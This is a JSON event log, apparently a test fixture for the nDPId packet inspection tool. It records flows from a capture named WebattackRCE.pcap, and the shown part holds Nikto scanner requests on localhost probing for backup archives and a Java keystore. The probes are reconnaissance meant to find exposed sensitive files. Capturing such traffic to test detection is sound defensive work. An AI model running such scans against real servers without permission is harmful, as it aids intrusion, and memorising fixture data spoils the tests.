+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277189,"pkt":"AAAAAAAAAAAAAAAACABFAADAxaRAAEAGdpF\/AAABfwAAAcQOH5BgW\/00es\/TMYAYAED+tAAAAQEICp1m\/O2dZvztR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_packet_id":1,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277190,"pkt":"AAAAAAAAAAAAAAAACABFAADACFhAAEAGM95\/AAABfwAAAcQQH5AQPjDI+venWYAYAED+tAAAAQEICp1m\/O6dZvzuR0VUIC8xMjcwLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277190,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277193,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hYJAAEAGtrZ\/AAABfwAAAcQSH5Cznr0TB99xxoAYAED+sQAAAQEICp1m\/PGdZvzwR0VUIC8wLmprcyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277193,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277194,"pkt":"AAAAAAAAAAAAAAAACABFAAC9JiRAAEAGFhV\/AAABfwAAAcQUH5CXxR6x507sMoAYAED+sQAAAQEICp1m\/PKdZvzyR0VUIC8wLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277194,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277196,"pkt":"AAAAAAAAAAAAAAAACABFAADASbJAAEAG8oN\/AAABfwAAAcQWH5DgxXEkcLyXoIAYAED+tAAAAQEICp1m\/PSdZvz0R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277196,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277198,"pkt":"AAAAAAAAAAAAAAAACABFAADAjLtAAEAGr3p\/AAABfwAAAcQYH5DOSLQrVcLjaIAYAED+tAAAAQEICp1m\/PadZvz2R0VUIC8xMjcwLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277198,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277200,"pkt":"AAAAAAAAAAAAAAAACABFAADFaNRAAEAG01x\/AAABfwAAAcQaH5BzoVBHI7Wyn4AYAED+uQAAAQEICp1m\/PidZvz4R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277200,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277201,"pkt":"AAAAAAAAAAAAAAAACABFAADFz59AAEAGbJF\/AAABfwAAAcQcH5D4h\/cKGx\/I\/4AYAED+uQAAAQEICp1m\/PmdZvz5R0VUIC8xMjcuMC4wLjEudGd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277201,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277203,"pkt":"AAAAAAAAAAAAAAAACABFAADBfg5AAEAGviZ\/AAABfwAAAcQeH5A6WEaZ3wpBiYAYAED+tQAAAQEICp1m\/PudZvz7R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":331,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277203,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277204,"pkt":"AAAAAAAAAAAAAAAACABFAADBsIBAAEAGi7R\/AAABfwAAAcQgH5BX0ojsod\/7v4AYAED+tQAAAQEICp1m\/PydZvz8R0VUIC8xMjcwMC56aXAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":332,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277204,"flow_last_seen":1576420277204,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277204,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50208,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277206,"pkt":"AAAAAAAAAAAAAAAACABFAADEp6FAAEAGlJB\/AAABfwAAAcQiH5DXnp8L7+WKyYAYAED+uAAAAQEICp1m\/P6dZvz+R0VUIC8xMjcwLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277206,"flow_last_seen":1576420277206,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277206,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50210,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 